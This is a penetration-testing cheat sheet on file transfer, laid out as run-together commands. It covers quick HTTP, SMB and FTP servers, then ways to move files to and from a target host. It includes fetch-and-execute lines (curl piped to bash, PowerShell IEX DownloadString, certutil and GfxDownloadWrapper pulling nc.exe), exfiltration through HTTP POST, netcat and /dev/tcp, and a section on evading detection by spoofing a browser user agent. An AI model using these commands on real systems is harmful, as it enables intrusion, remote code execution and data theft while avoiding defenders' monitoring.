Transferring Files
Simple Servers
python3 -m http.server 8000smbserver.py -smb2support share $(pwd)smbserver.py -smb2support share $(pwd) -user qu35t -password qu35tpython3 -m pyftpdlib -p 21python3 -m uploadserverphp -S 0.0.0.0:8000ruby -run -ehttpd . -p8000Transfer Files
wget http://10.10.10.10:8000/linpeas.sh -O linpeas.shcurl http://10.10.10.10:8000/linpeas.sh -o /dev/shm/linpeas.shcurl http://10.10.10.10:8000/linpeas.sh|bashWith SMB server.
copy file.txt \\10.10.10.10\share
copy \\10.10.10.10\share\nc.exenet use n: \\10.10.10.10\share /user:qu35t qu35t
copy file.txt n:
copy n:\nc.exeFile download.
(New-Object Net.WebClient).DownloadFile('https://docs.qu35t.pw/file.ps1','C:\Users\Public\Downloads\file.ps1')(New-Object Net.WebClient).DownloadFileAsync('https://docs.qu35t.pw/file.ps1','C:\Users\Public\Downloads\file.ps1')IEX (New-Object Net.WebClient).DownloadString('https://docs.qu35t.pw/file.ps1')(New-Object Net.WebClient).DownloadString('https://docs.qu35t.pw/file.ps1') | IEXInvoke-WebRequest https://docs.qu35t.pw/file.ps1 -OutFile file.ps1Invoke-WebRequest https://docs.qu35t.pw/file.ps1 -UseBasicParsing | IEXInvoke-RestMethod https://docs.qu35t.pw/file.ps1 -OutFile file.ps1certutil -urlcache -split -f http://10.10.10.10/nc.exedecertutil -verifyctl -split -f http://10.10.10.10/nc.exeGfxDownloadWrapper.exe "http://10.10.10.10/nc.exe" "C:\Temp\nc.exe"File upload.
Invoke-FileUpload -Uri http://10.10.10.10:8000/upload -File C:\Windows\System32\drivers\etc\hosts$b64 = [System.convert]::ToBase64String((Get-Content -Path 'C:\Windows\System32\drivers\etc\hosts' -Encoding Byte))
Invoke-WebRequest -Uri http://10.10.10.10:8000/ -Method POST -Body $b64scp linpeas.sh qu35t@10.10.10.10:/dev/shm/linpeas.shscp qu35t@10.10.10.10:/dev/shm/linpeas.sh .Linux
Encode and decode from base64.
base64 linpeas.sh -w 0;echoecho 'Base64 data'|base64 -d > linpeas.shWindows
Encode and decode from base64.
[Convert]::ToBase64String((Get-Content -path "C:\Windows\system32\drivers\etc\hosts" -Encoding byte))[IO.File]::WriteAllBytes("C:\Users\Public\id_rsa", [Convert]::FromBase64String("BASE64 DATA"))Check MD5 signature.
Get-FileHash C:\Users\Public\id_rsa -Algorithm md5 | select Hashcat linpeas.sh|nc 10.10.10.10 8001nc -lvnp 8001 > linpeas.shcat < /dev/tcp/10.10.10.10/443 > linpeas.shConnect to the target webserver.
exec 3<>/dev/tcp/10.10.10.10/80HTTP GET request.
echo -e "GET /linpeas.sh HTTP/1.1\n\n">&3Print the response.
cat <&3Mounting a linux folder.
rdesktop 10.10.10.10 -d QU35T.pw -u administrator -p 'Password0@' -r disk:linux='/home/qu35t/files'xfreerdp /v:10.10.10.10 /d:QU35T.pw /u:administrator /p:'Password0@' /drive:linux,/home/qu35t/filesValidating File Transfers
file linpeas.shmd5sum linpeas.shEvading Detection
Listing out user agents.
[Microsoft.PowerShell.Commands.PSUserAgent].GetProperties() | Select-Object Name,@{label="User Agent";Expression={[Microsoft.PowerShell.Commands.PSUserAgent]::$($_.Name)}} | flWith Chrome user agent.
Invoke-WebRequest http://10.10.10.10/nc.exe -UserAgent [Microsoft.PowerShell.Commands.PSUserAgent]::Chrome -OutFile "C:\Users\Public\nc.exe"References
Last updated